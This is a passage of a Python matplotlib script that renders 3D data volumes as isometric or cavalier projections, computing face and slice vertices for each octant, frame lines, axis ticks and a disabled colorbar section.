LineCollection(rightline, color='k')\n rightline2 = [[(q5x, q5y), (q6x, q6y)]]\n rightline2 = LineCollection(rightline2, color='k')\n if args.centerframe:\n if takeslice:\n centerline = [[(p2x, p2y), (q2x, q2y)], [(p3x, p3y), (q3x, q3y)], [(p6x, p6y), (q6x, q6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n else:\n centerline = [[(p4x, p4y), (p2x, p2y)], [(p4x, p4y), (p3x, p3y)], [(p4x, p4y), (p6x, p6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n centerline2 = [[(q7x, q7y), (q1x, q1y)], [(q7x, q7y), (q5x, q5y)], [(q7x, q7y), (q8x, q8y)]]\n centerline2 = LineCollection(centerline2, color='k', zorder=2, linestyle='dashed')\n\nif octant_2:\n\n #\n # A sketch of cavalier projection. \n # The relative point positions also apply to isometric projection\n #\n #\n # 8 *------------------------* 6\n # /. face 23 /|\n # / . / |\n # / . #............# |\n # / . .: : |\n # / . . : : |\n # 2 / *(7) . : (4) : * 5 (size3)\n # *-----------# #............# /\n # | size1 : . . /\n # | :. . / face 13\n # | #............# /\n # | | /\n # | face 12 |/ ) angle\n # *------------------------* ----\n # 1 3 (size2)\n #\n\n # vertices positions for faces\n p1x, p1y = isometric_projection(0, size2, 0, angles)\n p2x, p2y = isometric_projection(0, size2, size1, angles)\n p3x, p3y = isometric_projection(0, 0, 0, angles)\n p4x, p4y = isometric_projection(0, 0, size1, angles)\n p5x, p5y = isometric_projection(size3, 0, 0, angles)\n p6x, p6y = isometric_projection(size3, 0, size1, angles)\n p7x, p7y = isometric_projection(size3, size2, 0, angles)\n p8x, p8y = isometric_projection(size3, size2, size1, angles)\n\n # set slice cut plane\n if x1end != x1beg:\n scale1 = size1 / (x1end - x1beg)\n else:\n scale1 = 1.0e2\n if x2end != x2beg:\n scale2 = size2 / (x2end - x2beg)\n else:\n scale2 = 1.0e2\n if x3end != x3beg:\n scale3 = size3 / (x3end - x3beg)\n else:\n scale3 = 1.0e2\n sl1 = size1 - (sl1 - x1beg) / ((n1end - n1beg - 1) * d1) * size1\n sl2 = (sl2 - x2beg) / ((n2end - n2beg - 1) * d2) * size2\n sl3 = (sl3 - x3beg) / ((n3end - n3beg - 1) * d3) * size3\n\n # vertices positions for slices\n q1x, q1y = isometric_projection(0, sl2, sl1, angles)\n q2x, q2y = isometric_projection(0, sl2, size1, angles)\n q3x, q3y = isometric_projection(0, 0, sl1, angles)\n q4x, q4y = isometric_projection(0, 0, size1, angles)\n q5x, q5y = isometric_projection(sl3, 0, sl1, angles)\n q6x, q6y = isometric_projection(sl3, 0, size1, angles)\n q7x, q7y = isometric_projection(sl3, sl2, sl1, angles)\n q8x, q8y = isometric_projection(sl3, sl2, size1, angles)\n\n # face 13 coordinates\n face13x = [p4x, p3x, p5x, p6x]\n face13y = [p4y, p3y, p5y, p6y]\n\n # face 23 coordinates\n face23x = [p4x, p2x, p8x, p6x]\n face23y = [p4y, p2y, p8y, p6y]\n\n # face 12 coordinates\n face12x = [p4x, p3x, p1x, p2x]\n face12y = [p4y, p3y, p1y, p2y]\n\n # slice 13 coordinates\n slice13x = [q2x, q1x, q7x, q8x]\n slice13y = [q2y, q1y, q7y, q8y]\n\n # slice 23 coordinates\n slice23x = [q3x, q1x, q7x, q5x]\n slice23y = [q3y, q1y, q7y, q5y]\n\n # slice 12 coordinates\n slice12x = [q6x, q5x, q7x, q8x]\n slice12y = [q6y, q5y, q7y, q8y]\n\n # axis limits\n xlim = [p1x - 0.01, p5x + 0.01]\n ylim = [p3y - 0.01, p8y + 0.01]\n\n # frames\n if args.frametop:\n topline = [[(p2x, p2y), (p8x, p8y), (p6x, p6y)]]\n topline = LineCollection(topline, color='k')\n topline2 = [[(q2x, q2y), (q8x, q8y), (q6x, q6y)]]\n topline2 = LineCollection(topline2, color='k')\n if args.framebottom:\n bottomline = [[(p1x, p1y), (p3x, p3y), (p5x, p5y)]]\n bottomline = LineCollection(bottomline, color='k')\n bottomline2 = [[(q1x, q1y), (q3x, q3y), (q5x, q5y)]]\n bottomline2 = LineCollection(bottomline2, color='k')\n if args.frameleft:\n leftline = [[(p2x, p2y), (p1x, p1y)]]\n leftline = LineCollection(leftline, color='k')\n leftline2 = [[(q2x, q2y), (q1x, q1y)]]\n leftline2 = LineCollection(leftline2, color='k')\n if args.frameright:\n rightline = [[(p6x, p6y), (p5x, p5y)]]\n rightline = LineCollection(rightline, color='k')\n rightline2 = [[(q6x, q6y), (q5x, q5y)]]\n rightline2 = LineCollection(rightline2, color='k')\n if args.centerframe:\n if takeslice:\n centerline = [[(p2x, p2y), (q2x, q2y)], [(p3x, p3y), (q3x, q3y)], [(p6x, p6y), (q6x, q6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n else:\n centerline = [[(p4x, p4y), (p2x, p2y)], [(p4x, p4y), (p6x, p6y)], [(p4x, p4y), (p3x, p3y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n centerline2 = [[(q7x, q7y), (q1x, q1y)], [(q7x, q7y), (q5x, q5y)], [(q7x, q7y), (q8x, q8y)]]\n centerline2 = LineCollection(centerline2, color='k', zorder=2, linestyle='dashed')\n\nif octant_3:\n\n #\n # A sketch of cavalier projection. \n # The relative point positions also apply to isometric projection. \n #\n #\n # 8 *------------------------* 6\n # /. /|\n # / . / |\n # / . #............# |\n # / . .: : |\n # / . . : : |\n # 2 / *(7) . : (4) : * 5 (size2)\n # *-----------# #............# /\n # | size1 : . . /\n # | :. . /\n # | #............# /\n # | | /\n # | |/ ) angle\n # *------------------------* ----\n # 1 3 (size3)\n #\n\n # vertices positions for faces\n p1x, p1y = isometric_projection(0, size3, 0, angles)\n p2x, p2y = isometric_projection(0, size3, size1, angles)\n p3x, p3y = isometric_projection(0, 0, 0, angles)\n p4x, p4y = isometric_projection(0, 0, size1, angles)\n p5x, p5y = isometric_projection(size2, 0, 0, angles)\n p6x, p6y = isometric_projection(size2, 0, size1, angles)\n p7x, p7y = isometric_projection(size2, size3, 0, angles)\n p8x, p8y = isometric_projection(size2, size3, size1, angles)\n\n # set slice cut plane\n if x1end != x1beg:\n scale1 = size1 / (x1end - x1beg)\n else:\n scale1 = 1.0e2\n if x2end != x2beg:\n scale2 = size2 / (x2end - x2beg)\n else:\n scale2 = 1.0e2\n if x3end != x3beg:\n scale3 = size3 / (x3end - x3beg)\n else:\n scale3 = 1.0e2\n sl1 = size1 - (sl1 - x1beg) / ((n1end - n1beg - 1) * d1) * size1\n sl2 = size2 - (sl2 - x2beg) / ((n2end - n2beg - 1) * d2) * size2\n sl3 = (sl3 - x3beg) / ((n3end - n3beg - 1) * d3) * size3\n\n # vertices positions for slices\n q1x, q1y = isometric_projection(0, sl3, sl1, angles)\n q2x, q2y = isometric_projection(0, sl3, size1, angles)\n q3x, q3y = isometric_projection(0, 0, sl1, angles)\n q4x, q4y = isometric_projection(0, 0, size1, angles)\n q5x, q5y = isometric_projection(sl2, 0, sl1, angles)\n q6x, q6y = isometric_projection(sl2, 0, size1, angles)\n q7x, q7y = isometric_projection(sl2, sl3, sl1, angles)\n q8x, q8y = isometric_projection(sl2, sl3, size1, angles)\n\n # face 13 coordinates\n face13x = [p4x, p3x, p1x, p2x]\n face13y = [p4y, p3y, p1y, p2y]\n\n # face 23 coordinates\n face23x = [p6x, p4x, p2x, p8x]\n face23y = [p6y, p4y, p2y, p8y]\n\n # face 12 coordinates\n face12x = [p6x, p5x, p3x, p4x]\n face12y = [p6y, p5y, p3y, p4y]\n\n # slice 13 coordinates\n slice13x = [q6x, q5x, q7x, q8x]\n slice13y = [q6y, q5y, q7y, q8y]\n\n # slice 23 coordinates\n slice23x = [q5x, q3x, q1x, q7x]\n slice23y = [q5y, q3y, q1y, q7y]\n\n # slice 12 coordinates\n slice12x = [q8x, q7x, q1x, q2x]\n slice12y = [q8y, q7y, q1y, q2y]\n\n # axis limits\n xlim = [p1x - 0.01, p5x + 0.01]\n ylim = [p3y - 0.01, p8y + 0.01]\n\n # frames\n if args.frametop:\n topline = [[(p2x, p2y), (p8x, p8y), (p6x, p6y)]]\n topline = LineCollection(topline, color='k')\n topline2 = [[(q2x, q2y), (q8x, q8y), (q6x, q6y)]]\n topline2 = LineCollection(topline2, color='k')\n if args.framebottom:\n bottomline = [[(p1x, p1y), (p3x, p3y), (p5x, p5y)]]\n bottomline = LineCollection(bottomline, color='k')\n bottomline2 = [[(q1x, q1y), (q3x, q3y), (q5x, q5y)]]\n bottomline2 = LineCollection(bottomline2, color='k')\n if args.frameleft:\n leftline = [[(p1x, p1y), (p2x, p2y)]]\n leftline = LineCollection(leftline, color='k')\n leftline2 = [[(q1x, q1y), (q2x, q2y)]]\n leftline2 = LineCollection(leftline2, color='k')\n if args.frameright:\n rightline = [[(p5x, p5y), (p6x, p6y)]]\n rightline = LineCollection(rightline, color='k')\n rightline2 = [[(q5x, q5y), (q6x, q6y)]]\n rightline2 = LineCollection(rightline2, color='k')\n if args.centerframe:\n if takeslice:\n centerline = [[(p2x, p2y), (q2x, q2y)], [(p3x, p3y), (q3x, q3y)], [(p6x, p6y), (q6x, q6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n else:\n centerline = [[(p4x, p4y), (p2x, p2y)], [(p4x, p4y), (p6x, p6y)], [(p4x, p4y), (p3x, p3y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n centerline2 = [[(q7x, q7y), (q1x, q1y)], [(q7x, q7y), (q5x, q5y)], [(q7x, q7y), (q8x, q8y)]]\n centerline2 = LineCollection(centerline2, color='k', zorder=2, linestyle='dashed')\n\nif octant_4:\n\n #\n # A sketch of cavalier projection. \n # The relative point positions also apply to isometric projection.\n #\n #\n # 8 *------------------------* 6\n # /. face 23 /|\n # / . / |\n # / . #............# |\n # / . .: : |\n # / . . : : |\n # 2 / *(7) . : (4) : * 5 (size3)\n # *-----------# #............# /\n # | size1 : . . /\n # | :. . / face 13\n # | #............# /\n # | | /\n # | face 12 |/ ) angle\n # *------------------------* ----\n # 1 3 (size2)\n #\n\n # vertices positions for faces\n p1x, p1y = isometric_projection(0, size2, 0, angles)\n p2x, p2y = isometric_projection(0, size2, size1, angles)\n p3x, p3y = isometric_projection(0, 0, 0, angles)\n p4x, p4y = isometric_projection(0, 0, size1, angles)\n p5x, p5y = isometric_projection(size3, 0, 0, angles)\n p6x, p6y = isometric_projection(size3, 0, size1, angles)\n p7x, p7y = isometric_projection(size3, size2, 0, angles)\n p8x, p8y = isometric_projection(size3, size2, size1, angles)\n\n # set slice cut plane\n if x1end != x1beg:\n scale1 = size1 / (x1end - x1beg)\n else:\n scale1 = 1.0e2\n if x2end != x2beg:\n scale2 = size2 / (x2end - x2beg)\n else:\n scale2 = 1.0e2\n if x3end != x3beg:\n scale3 = size3 / (x3end - x3beg)\n else:\n scale3 = 1.0e2\n sl1 = size1 - (sl1 - x1beg) / ((n1end - n1beg - 1) * d1) * size1\n sl2 = size2 - (sl2 - x2beg) / ((n2end - n2beg - 1) * d2) * size2\n sl3 = size3 - (sl3 - x3beg) / ((n3end - n3beg - 1) * d3) * size3\n\n # vertices positions for slices\n q1x, q1y = isometric_projection(0, sl2, sl1, angles)\n q2x, q2y = isometric_projection(0, sl2, size1, angles)\n q3x, q3y = isometric_projection(0, 0, sl1, angles)\n q4x, q4y = isometric_projection(0, 0, size1, angles)\n q5x, q5y = isometric_projection(sl3, 0, sl1, angles)\n q6x, q6y = isometric_projection(sl3, 0, size1, angles)\n q7x, q7y = isometric_projection(sl3, sl2, sl1, angles)\n q8x, q8y = isometric_projection(sl3, sl2, size1, angles)\n\n # face 13 coordinates\n face13x = [p6x, p5x, p3x, p4x]\n face13y = [p6y, p5y, p3y, p4y]\n\n # face 23 coordinates\n face23x = [p8x, p6x, p4x, p2x]\n face23y = [p8y, p6y, p4y, p2y]\n\n # face 12 coordinates\n face12x = [p2x, p1x, p3x, p4x]\n face12y = [p2y, p1y, p3y, p4y]\n\n # slice 13 coordinates\n slice13x = [q8x, q7x, q1x, q2x]\n slice13y = [q8y, q7y, q1y, q2y]\n\n # slice 23 coordinates\n slice23x = [q7x, q5x, q3x, q1x]\n slice23y = [q7y, q5y, q3y, q1y]\n\n # slice 12 coordinates\n slice12x = [q8x, q7x, q5x, q6x]\n slice12y = [q8y, q7y, q5y, q6y]\n\n # axis limits\n xlim = [p1x - 0.01, p5x + 0.01]\n ylim = [p3y - 0.01, p8y + 0.01]\n\n # frames\n if args.frametop:\n topline = [[(p2x, p2y), (p8x, p8y), (p6x, p6y)]]\n topline = LineCollection(topline, color='k')\n topline2 = [[(q2x, q2y), (q8x, q8y), (q6x, q6y)]]\n topline2 = LineCollection(topline2, color='k')\n if args.framebottom:\n bottomline = [[(p1x, p1y), (p3x, p3y), (p5x, p5y)]]\n bottomline = LineCollection(bottomline, color='k')\n bottomline2 = [[(q1x, q1y), (q3x, q3y), (q5x, q5y)]]\n bottomline2 = LineCollection(bottomline2, color='k')\n if args.frameleft:\n leftline = [[(p2x, p2y), (p1x, p1y)]]\n leftline = LineCollection(leftline, color='k')\n leftline2 = [[(q2x, q2y), (q1x, q1y)]]\n leftline2 = LineCollection(leftline2, color='k')\n if args.frameright:\n rightline = [[(p6x, p6y), (p5x, p5y)]]\n rightline = LineCollection(rightline, color='k')\n rightline2 = [[(q6x, q6y), (q5x, q5y)]]\n rightline2 = LineCollection(rightline2, color='k')\n if args.centerframe:\n if takeslice:\n centerline = [[(p2x, p2y), (q2x, q2y)], [(p3x, p3y), (q3x, q3y)], [(p6x, p6y), (q6x, q6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n else:\n centerline = [[(p4x, p4y), (p2x, p2y)], [(p4x, p4y), (p6x, p6y)], [(p4x, p4y), (p3x, p3y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n centerline2 = [[(q7x, q7y), (q1x, q1y)], [(q7x, q7y), (q5x, q5y)], [(q7x, q7y), (q8x, q8y)]]\n centerline2 = LineCollection(centerline2, color='k', zorder=2, linestyle='dashed')\n\n## set colormap\nfrom module_colormap import set_colormap\ncolormap = set_colormap(args)\n\n## set clip\nfrom module_clip import *\ndata = np.concatenate((fdata12.flatten(), fdata13.flatten(), fdata23.flatten()))\nif args.slice1 is not None:\n data = np.concatenate((data, data23.flatten()))\nif args.slice2 is not None:\n data = np.concatenate((data, data13.flatten()))\nif args.slice3 is not None:\n data = np.concatenate((data, data12.flatten()))\ncmin, cmax = set_clip(args, data, 'fore', dmin, dmax)\nif args.norm == 'log':\n if cmin > np.floor(cmax) or cmax < np.ceil(cmin):\n print('error: values in dataset have same order of magnitude')\n exit()\n\n## plot the projection faces and slices\nangle1 = angle1\n\nfigheight = p8y - p3y\nfigwidth = max(p5x, p6x) - min(p1x, p2x)\n\nfig = plt.figure(figsize=(figwidth, figheight))\nax = fig.add_axes([0, 0, 1, 1])\n\nproject_contour(args, ax, fdata13, face13x, face13y, colormap, cmin, cmax, font, mask13)\nproject_contour(args, ax, fdata23, face23x, face23y, colormap, cmin, cmax, font, mask23)\nproject_contour(args, ax, fdata12, face12x, face12y, colormap, cmin, cmax, font, mask12)\n\nif args.frametop:\n ax.add_collection(topline)\nif args.framebottom:\n ax.add_collection(bottomline)\nif args.frameleft:\n ax.add_collection(leftline)\nif args.frameright:\n ax.add_collection(rightline)\nif args.centerframe:\n ax.add_collection(centerline)\n\nif args.slice1 is not None or args.slice2 is not None or args.slice3 is not None:\n\n project_contour(args, ax, data13, slice13x, slice13y, colormap, cmin, cmax, font)\n project_contour(args, ax, data23, slice23x, slice23y, colormap, cmin, cmax, font)\n project_contour(args, ax, data12, slice12x, slice12y, colormap, cmin, cmax, font)\n\n if args.frametop:\n ax.add_collection(topline2)\n if args.framebottom:\n ax.add_collection(bottomline2)\n if args.frameleft:\n ax.add_collection(leftline2)\n if args.frameright:\n ax.add_collection(rightline2)\n if args.centerframe:\n ax.add_collection(centerline2)\n\n## set ticks\n# major ticks style\ntick_major_length = float(args.tickmajorlen)\ntick_major_width = float(args.tickmajorwid)\n\n# minor ticks style\nif args.tickminorlen is None:\n tick_minor_length = 0.5 * tick_major_length\nelse:\n tick_minor_length = float(args.tickminorlen)\n\nif args.tickminorwid is None:\n tick_minor_width = 0.75 * tick_major_width\nelse:\n tick_minor_width = float(args.tickminorwid)\n\n# tick font size\nlabel_1_size = float(args.label1size)\nlabel_2_size = float(args.label2size)\nlabel_3_size = float(args.label3size)\n\nif args.tick1size is None:\n tick_1_size = label_1_size - 2\nelse:\n tick_1_size = float(args.tick1size)\n\nif args.tick2size is None:\n tick_2_size = label_2_size - 2\nelse:\n tick_2_size = float(args.tick2size)\n\nif args.tick3size is None:\n tick_3_size = label_3_size - 2\nelse:\n tick_3_size = float(args.tick3size)\n\nif octant_1:\n\n # axis 1\n if args.axis1loc == 'left' or args.axis1loc == 'both':\n project_axis(ax, p2x, p2y, p1x, p1y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'clock', 'counterclock', tick_1_size,\n args.label1, 'negative', label_1_size, float(args.label1pad), args.tick1format)\n\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n project_axis(ax, p6x, p6y, p5x, p5y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'counterclock', 'counterclock', tick_1_size,\n args.label1, 'positive', label_1_size, float(args.label1pad), args.tick1format)\n\n # axis 2\n if args.axis2loc == 'top' or args.axis2loc == 'both':\n project_axis(ax, p2x, p2y, p8x, p8y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'counterclock', 'positive', tick_2_size,\n args.label2, 'positive', label_2_size, float(args.label2pad), args.tick2format)\n\n if args.axis2loc == 'bottom' or args.axis2loc == 'both':\n project_axis(ax, p3x, p3y, p5x, p5y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'clock', 'positive', tick_2_size,\n args.label2, 'positive', label_2_size, float(args.label2pad), args.tick2format)\n\n # axis 3\n if args.axis3loc == 'top' or args.axis3loc == 'both':\n project_axis(ax, p8x, p8y, p6x, p6y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'counterclock', 'positive', tick_3_size,\n args.label3, 'positive', label_3_size, float(args.label3pad), args.tick3format)\n\n if args.axis3loc == 'bottom' or args.axis3loc == 'both':\n project_axis(ax, p1x, p1y, p3x, p3y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'clock', 'positive', tick_3_size,\n args.label3, 'positive', label_3_size, float(args.label3pad), args.tick3format)\n\nif octant_2:\n\n # axis 1\n if args.axis1loc == 'left' or args.axis1loc == 'both':\n project_axis(ax, p2x, p2y, p1x, p1y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'clock', 'counterclock', tick_1_size,\n args.label1, 'negative', label_1_size, float(args.label1pad), args.tick1format)\n\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n project_axis(ax, p6x, p6y, p5x, p5y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'counterclock', 'counterclock', tick_1_size,\n args.label1, 'positive', label_1_size, float(args.label1pad), args.tick1format)\n\n # axis 2\n if args.axis2loc == 'top' or args.axis2loc == 'both':\n project_axis(ax, p6x, p6y, p8x, p8y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'clock', 'negative', tick_2_size,\n args.label2, 'negative', label_2_size, float(args.label2pad), args.tick2format)\n\n if args.axis2loc == 'bottom' or args.axis2loc == 'both':\n project_axis(ax, p3x, p3y, p1x, p1y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'counterclock', 'negative', tick_2_size,\n args.label2, 'negative', label_2_size, float(args.label2pad), args.tick2format)\n\n # axis 3\n if args.axis3loc == 'top' or args.axis3loc == 'both':\n project_axis(ax, p2x, p2y, p8x, p8y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'counterclock', 'positive', tick_3_size,\n args.label3, 'positive', label_3_size, float(args.label3pad), args.tick3format)\n\n if args.axis3loc == 'bottom' or args.axis3loc == 'both':\n project_axis(ax, p3x, p3y, p5x, p5y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'clock', 'positive', tick_3_size,\n args.label3, 'positive', label_3_size, float(args.label3pad), args.tick3format)\n\nif octant_3:\n\n # axis 1\n if args.axis1loc == 'left' or args.axis1loc == 'both':\n project_axis(ax, p2x, p2y, p1x, p1y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'clock', 'counterclock', tick_1_size,\n args.label1, 'negative', label_1_size, float(args.label1pad), args.tick1format)\n\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n project_axis(ax, p6x, p6y, p5x, p5y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'counterclock', 'counterclock', tick_1_size,\n args.label1, 'positive', label_1_size, float(args.label1pad), args.tick1format)\n\n # axis 2\n if args.axis2loc == 'top' or args.axis2loc == 'both':\n project_axis(ax, p8x, p8y, p2x, p2y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'clock', 'negative', tick_2_size,\n args.label2, 'negative', label_2_size, float(args.label2pad), args.tick2format)\n\n if args.axis2loc == 'bottom' or args.axis2loc == 'both':\n project_axis(ax, p5x, p5y, p3x, p3y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'counterclock', 'negative', tick_2_size,\n args.label2, 'negative', label_2_size, float(args.label2pad), args.tick2format)\n\n # axis 3\n if args.axis3loc == 'top' or args.axis3loc == 'both':\n project_axis(ax, p6x, p6y, p8x, p8y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'clock', 'negative', tick_3_size,\n args.label3, 'negative', label_3_size, float(args.label3pad), args.tick3format)\n\n if args.axis3loc == 'bottom' or args.axis3loc == 'both':\n project_axis(ax, p3x, p3y, p1x, p1y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'counterclock', 'negative', tick_3_size,\n args.label3, 'negative', label_3_size, float(args.label3pad), args.tick3format)\n\nif octant_4:\n\n # axis 1\n if args.axis1loc == 'left' or args.axis1loc == 'both':\n project_axis(ax, p2x, p2y, p1x, p1y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'clock', 'counterclock', tick_1_size,\n args.label1, 'negative', label_1_size, float(args.label1pad), args.tick1format)\n\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n project_axis(ax, p6x, p6y, p5x, p5y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'counterclock', 'counterclock', tick_1_size,\n args.label1, 'positive', label_1_size, float(args.label1pad), args.tick1format)\n\n # axis 2\n if args.axis2loc == 'top' or args.axis2loc == 'both':\n project_axis(ax, p8x, p8y, p6x, p6y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'counterclock', 'positive', tick_2_size,\n args.label2, 'positive', label_2_size, float(args.label2pad), args.tick2format)\n\n if args.axis2loc == 'bottom' or args.axis2loc == 'both':\n project_axis(ax, p1x, p1y, p3x, p3y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'clock', 'positive', tick_2_size,\n args.label2, 'positive', label_2_size, float(args.label2pad), args.tick2format)\n\n # axis 3\n if args.axis3loc == 'top' or args.axis3loc == 'both':\n project_axis(ax, p8x, p8y, p2x, p2y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'clock', 'negative', tick_3_size,\n args.label3, 'negative', label_3_size, float(args.label3pad), args.tick3format)\n\n if args.axis3loc == 'bottom' or args.axis3loc == 'both':\n project_axis(ax, p5x, p5y, p3x, p3y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'counterclock', 'negative', tick_3_size,\n args.label3, 'negative', label_3_size, float(args.label3pad), args.tick3format)\n\n# remove original figure frames\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_visible(False)\nax.spines['left'].set_visible(False)\n\n# remove original figure ticks and labels\nax.tick_params(which='both',\n top='off',\n bottom='off',\n labeltop='off',\n labelbottom='off',\n left='off',\n right='off',\n labelleft='off',\n labelright='off')\n\n## set colorbar\n# when using filled contour, the colorbar coding could be a little tricky\n# therefore dismissed -- little use anyway\n# colorbar for filled contour is also dismissed in 2D case (showcontour)\n# if args.legend and cmin != cmax:\nif False:\n\n lloc = args.lloc\n\n # colorbar values\n cp = 512\n cinterval = (cmax - cmin) / (cp - 1)\n temp = np.linspace(cmin, cmax, cp)\n cval = np.zeros([cp, 1])\n for i in range(0, cp):\n cval[i] = temp[i]\n\n if lloc in ['left', 'right']:\n\n if args.lheight is None:\n lheight = figheight\n else:\n lheight = float(args.lheight)\n if lheight > figheight:\n lheight = figheight\n\n if args.lwidth is None:\n lwidth = 0.2\n else:\n lwidth = float(args.lwidth)\n\n if lloc == 'right':\n\n # colorbar location\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n pad = tick_1_size * ipp + float(args.tickmajorlen) * ipp + 0.5 + label_1_size * ipp\n else:\n pad = 0.2\n if args.lpad is None:\n cbpad = 0.0\n else:\n cbpad = float(args.lpad)\n pad = pad + cbpad\n cx = [p5x + pad, p5x + pad, p5x + pad + lwidth, p5x + pad + lwidth]\n dl = (figheight - lheight) / 2.0\n cy = [p3y + dl, p8y - dl, p8y - dl, p3y + dl]\n\n if args.lloc in ['top', 'bottom']:\n\n if args.lheight is None:\n lheight = 0.2\n else:\n lheight = float(args.lheight)\n\n if args.lwidth is None:\n lwidth = figwidth\n else:\n lwidth = float(args.lwidth)\n if lwidth > figwidth:\n lwidth = figwidth\n\n if lloc == 'bottom':\n\n # colorbar location\n if args.axis2loc == 'bottom' or args.axis2loc == 'both' or args.axis3loc == 'bottom' or args.axis3loc == 'both':\n pad = max(tick_2_size, tick_3_size) * ipp + float(args.tickmajorlen) * ipp + 0.2 + max(\n label_2_size, label_3_size) * ipp + 0.1 * abs(cos(angle1 * np.pi / 180.0))\n else:\n pad = 0.2\n if args.lpad is None:\n cbpad = 0.0\n else:\n cbpad = float(args.lpad)\n pad = pad + cbpad\n dl = (figwidth - lwidth) / 2.0\n cx = [p1x + dl, p5x - dl, p5x - dl, p1x + dl]\n cy = [p3y - pad, p3y - pad, p3y - pad - lheight, p3y - pad - lheight]\n\n # create colorbar\n cb = project_image(ax, cval, cx, cy, colormap, cmin, cmax)\n\n # crate colorbar frame\n line = [[(cx[0], cy[0]), (cx[1], cy[1]), (cx[2], cy[2]), (cx[3], cy[3]), (cx[0], cy[0])]]\n line = LineCollection(line, linewidth=1.0, color='k')\n ax.add_collection(line)\n\n if args.unitsize is None:\n lufs = min(float(args.label1size), float(args.label2size), float(args.label3size)) - 1\n else:\n lufs = float(args.unitsize)\n\n # tick font size\n if args.lticksize is None:\n ltfs = lufs - 1\n else:\n ltfs = float(args.lticksize)\n\n if args.norm == 'linear':\n\n # set colorbar major ticks\n if args.ld is None:\n ld = nice((cmax - cmin) / 5.0)\n else:\n ld = float(args.ld)\n\n if args.ltickbeg is 